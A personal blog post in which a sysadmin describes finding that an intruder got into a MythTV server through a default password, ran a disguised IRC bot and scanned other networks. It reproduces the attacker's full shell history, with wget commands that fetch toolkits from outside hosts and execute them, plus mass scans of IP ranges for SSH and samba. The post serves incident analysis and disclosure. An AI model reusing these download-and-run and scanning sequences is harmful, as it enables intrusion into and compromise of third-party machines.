johnsu01 (johnsu01) wrote,
johnsu01
johnsu01

  • Music:

Me and the script kiddies

I woke up on the couch very early this morning, like around 4:30ish, after falling asleep trying to watch Kill Bill 1. I decided in my half-dazed state to check the disk space on one of my servers before going to bed, because it's been getting pretty close to full. I logged into the machine and typed last. Up came a login by user mythtv from a few days ago.

That's funny, because I sure didn't log in as mythtv any time recently, and I'm ostensibly the only one allowed to log into this machine.

mythtv was not logged in at that moment. But there was an sshd process running owned by mythtv. I checked the auth log, and sure enough, mythtv had logged in with a password. It was not in the middle of any other break-in attempts; just one successful login. It was probably because I, ahem, left the password at the default. I would not have done that intentionally, but I might have done it nonetheless.

So, long story short, someone got access to one of my machines for a few days. They didn't do anything to the machine, and I'm pretty certain after doing standard verification things that I was not rooted. They didn't send any mail out. They just ran an instance of EnergyMech, which they had renamed to sshd, probably for the same reason that they installed all this stuff in /tmp/.../. Yes, .... I admit I missed it the first time looking. The instance spawned 3 bots, who then logged into 3 different irc servers.

Since they didn't seem to be doing anything harmful, and because I was curious and wanted to learn from this incident, I ran tethereal all day and recorded their traffic. I now have an awful lot of people's (or other bots'?) undernet passwords, and some conversations in Romanian. I'm not sure yet what to do with this information. If any of you speak what they speak in Romania and would like to translate some log files, let me know.

I'll post some more details about this later. Some of you will find the ~/.bash_history file entertaining, so I'll include that here. I also killed and restarted the EnergyMech in debug mode, and logged that for a while.

The question remains how they knew right off the bat that I was running mythtv. I have three theories at the moment. One is that they could be combing freenode's #mythtv-users channel for IPs, because it is publicly logged, and I have been there before (although normally my IP is obscured by my cloak). Second is that there has been some kind of compromise that allows them to monitor connections to the servers that myth boxes talk to in order to fill their database with channel info. Third is that they just got really lucky, and got in on the first try with a list of default users and passwords. I suppose there is the fourth possibility that they doctored the logs and actually exploited something to get in, but it doesn't look like that to me.

Obviously I will comb the bot and traffic logs for IPs and try to notify people that their machines have been compromised. Anything else I should do?

You'll see that they did some port scanning too. I'm not sure yet what all these strangely named binaries do, other than scan. They probably ran some more cracking attempts on other machines. They tried to set up a PHP cgi-bin script that lets them execute shell commands.

Among the artifacts they left laying around are files of common passwords and usernames. But mythtv does not appear in any of these files.

They also ran mythtv-setup, which is downright bizarre. Maybe they were expecting X forwarding to be enabled (it's not). If that's the case, then that lends credibility to the theory that this is a mythtv-specific effort.

w
passwd
uname -a
ls
/etc/rc.d/init.d/httpd status
/etc/rc.d/init.d/sendmail status
 php -v
ps aux
cd .X11-unix
cd X11
cd /tmp/.X11-unix
ls
tar xzvf boti.tgz
rm -rf boti.tgz
cd mech
mv mech httpd
export PATH=:PATH
httpd
uname -a
w
mkdir public_html
ls
cd public_html
/etc/rc.d/init.d/sendmail status
/etc/rc.d/init.d/httpd status
uname -a
ps aux
w
mythtv-setup
w
w
uname -a
cd /tmp
mkdir ...
cd ...
ftp 202.50.176.69
tar xzvf boti.tgz
rm -rf boti.tgz
cd mech
mv mech httpd
export PATH=:PATH
httpd
wget www.fpt.uv.ro/scan/rooteam.tar.gz 
cd /tmp
wget www.fpt.uv.ro/scan/rooteam.tar.gz 
tar -zxvf rooteam.tar.gz 
cd rooteam 
chmod +x * 
./auto 
mv unix assh 
chmod +x * 
./211
w
cd /tmp
ls
cd rooteam
ls
rm -rf 211  211.21.find.22 
chmod +x * 
 ./unix 24.16
./assh 24.16
./assh 24.17
./assh 24.18
./assh 24.19
./assh 24.20
 ./assh 24.21
./assh 24.22
./assh 24.23
 ./assh 24.24
 ./assh 24.25
./assh 24.26
./assh 24.27
 ./assh 24.28
 ./assh 24.29
 ./assh 24.30
./assh 24.31
./assh 24.32
./assh 24.33
 ./assh 24.34
./assh 24.35
./assh 24.36
./assh 24.37
./assh 24.38
./assh 24.39
./assh 24.40
./assh 24.41
./assh 24.42
./assh 24.43
 ./assh 24.44
cd /tmp
ls
rm -rf rooteam  
rm -rf rooteam.tar.gz 
wget www.fpt.uv.ro/scan/ssteam2.tgz
tar -zxvf ssteam2.tgz 
cd ssteam2 
chmod +x * 
./start 66.92
ls
./samba
ls
./samba 200.3
./o0o 
./o0o 200
./o0o 200.3
cd /tmp
ls
rm -rf ssteam2 ssteam2.tgz
wget www.fpt.uv.ro/scan/madiceman.tgz 
tar -zxvf madiceman.tgz 
cd madiceman 
chmod +x * 
./start 207.0
./start 207.1
./start 207.2
 ./start 216.69
 ./start 59.120
./start 59.121
./start 193.254
 ./start 211.234
./start 211.235
./start 61.74
./start 151.47
./start 193.147
./start 205.95
 ./start 138.217
cd /tmp
ls
rm -rf madiceman   madiceman.tgz
cd /var/tmp
ls
wget www.mihai22.as.ro/prv8.tgz
tar -xzvf prv8.tgz
cd ssh
./scan 67,0
 ./scan 67.0
 ./scan 66.90
./scan 216.130
 ./scan 206.212
./scan 200.118
./scan 66.130
uname -a
ps aux
w
cd /tmp
ls
wget franck.lydo.org/wtf.tar
tar xvf wtf.tar
cd wtf
./wtf 62.95
 ./wtf 212.174
 ./wtf 212.175
./wtf 212.176
./wtf 212.177
 ./wtf 83.146
 ./wtf 83.147
 ./wtf 137.132
 ./wtf 137.133
 ./wtf 137.134
 ./wtf 137.135
./wtf 137.136
 ./wtf 169.55
w
uname -a
ps aux
passwd
kill -9  29638 
cd /tmp
mkdir ...
cd ...
ls
rm -rf mech
wget www.ploiesti.cc/linux.tar.gz
tar -zxvf linux.tar.gz
cd http
cd kids
mv mech sshd
chmod +x *
PATH="." sshd
cd /tmp
wget www.ploiesti.cc/gov.tar
tar xvf gov.tar
rm -rf gov.tar
cd gov
chmod +x *
cat /proc/cpuinfo
./gov 61.150
./gov 61.151
 ./gov 61.152
 ./gov 61.153
./gov 61.154
./gov 61.155
Tags: crack, mythtv, security
Subscribe
  • Post a new comment

    Error

    default userpic
    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 10 comments